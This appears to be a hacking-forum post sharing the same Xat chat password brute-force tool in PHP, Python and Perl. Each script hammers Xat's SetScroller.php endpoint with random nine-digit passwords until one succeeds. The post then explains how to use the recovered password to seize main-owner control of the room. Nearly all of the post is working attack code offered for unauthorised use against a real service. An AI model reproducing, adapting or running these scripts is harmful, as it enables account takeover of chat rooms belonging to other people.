Made these a while back and posted them on Rile5. Was gonna' post them here but forgot, and I just remembered.
Forgot to put "Xat" in the title.

PHP version:

Code:
<?php
	function stribet($inputstr, $deliLeft, $deliRight) {
		$posLeft = stripos($inputstr, $deliLeft) + strlen($deliLeft);
		$posRight = stripos($inputstr, $deliRight, $posLeft);
		return substr($inputstr, $posLeft, $posRight - $posLeft);
	}
	Class Bruteforce {
		var $Chat = ""; //Chat's NAME Goes Here, Not It's ID!
		function Script(){
			echo "-------------------------------------------\n";
			echo "TheFox's Xat Chat Password Bruteforce v1.0\n";
			echo "-------------------------------------------\n\n";
			echo "NOTE: Once the bruteforce gets the password for the chat, the scroller on the bottom of the chat box will display the chat's password. Just use this link to get main owner: http://xat.com/web_gear/chat.php?id=CHAT'S ID&pw=THE PASSWORD ON THE SCROLLER\n";
			echo "Also, this will take a WHILE to get the chat's password. It will not find it right away, it's a bruteforce. Enjoy! ~ TheFox\n\n";
			sleep(5);
			$Start_Bruteforce = new Bruteforce();
			$Start_Bruteforce->Exploit();
		}
		function Exploit(){
			for($x=0; $x<=4564546; $x++) { 
				$Message = "Chat's Password: ";
				$Password = rand(100000000, 999999999);
				try {
					$HTML = file_get_contents('http://xat.com/'.$this->Chat);
					if (strpos($HTML,'flashvars="id=') != false) {
						$Chat_2 = stribet($HTML, 'flashvars="id=', '&');
						$Scroller = file_get_contents("http://xat.com/web_gear/chat/SetScroller.php?Message=$Message$Password&id=$Chat_2&pw=$Password");
					}
					else{
						echo "Please enter a valid chat name.\n";
						sleep(999999);
					}
				} catch (Exception $e) {
					echo "Please enter a valid chat name.\n";
					sleep(999999);
				}
				echo "Trying password => $Password\n";
			}
		}
	}
	$Script = new Bruteforce();
	$Script->Script();
?>
Python 2.7.3 version:

Code:
import urllib2, random, time
import os, subprocess
#NOTE: Once the bruteforce gets the password for the chat, the scroller on the bottom of the chat box will display the chat's password. Just use this link to get main owner: http://xat.com/web_gear/chat.php?id=CHAT'S ID&pw=THE PASSWORD ON THE SCROLLER
#Also, Also, this will take a WHILE to get the chat's password. It will not find it right away, it's a bruteforce. Enjoy! ~ TheFox

Room = ''#Chat's NAME goes here, not ID.
def getBetween(strSource, strStart,strEnd):
    start = strSource.find(strStart) + len(strStart)
    end = strSource.find(strEnd,start)
    return strSource[start:end]
Message = "Password: "
Room = urllib2.urlopen('http://xat.com/' + Room).read()
Chat = getBetween(Room,'flashvars="id=','&')
while 1:
    Password = random.randint(100000000,999999999)
    Message2 = Message + " " + str(Password)
    Scroller = urllib2.urlopen('http://xat.com/web_gear/chat/SetScroller.php?Message='+str(Message2)+'&id='+str(Chat)+'&pw='+str(Password)+'').read()
    print "Trying password => " + str(Password)
Perl version:
Code:
use WWW::Mechanize;
use LWP::Simple;
#NOTE: Once the bruteforce gets the password for the chat, the scroller on the bottom of the chat box will display the chat's password. Just use this link to get main owner: http://xat.com/web_gear/chat.php?id=CHAT'S ID&pw=THE PASSWORD ON THE SCROLLER
#Also, Also, this will take a WHILE to get the chat's password. It will not find it right away, it's a bruteforce. Enjoy! ~ TheFox

$Room = '';#Chats NAME goes here, not ID.
my $Site = WWW::Mechanize->new();
my $Chat = WWW::Mechanize->new();
$Chat->get("http://xat.com/$Room");
$Chat = $Chat->content();
print "$Chat";
$Chat =~ /flashvars="id=([^"]+)&/;
$Chat = $1;
my $Message = "Chat's Password: ";
while(1){
	$Value1 = 100000000;
	$Value2 = 999999999;
	my $Password = int(rand($Value2 - $Value1)) + $Value1;
	$Site->get("http://xat.com/web_gear/chat/SetScroller.php?Message=$Message$Password&id=$Chat&pw=$Password");
	print("Trying Password: $Password\n");
}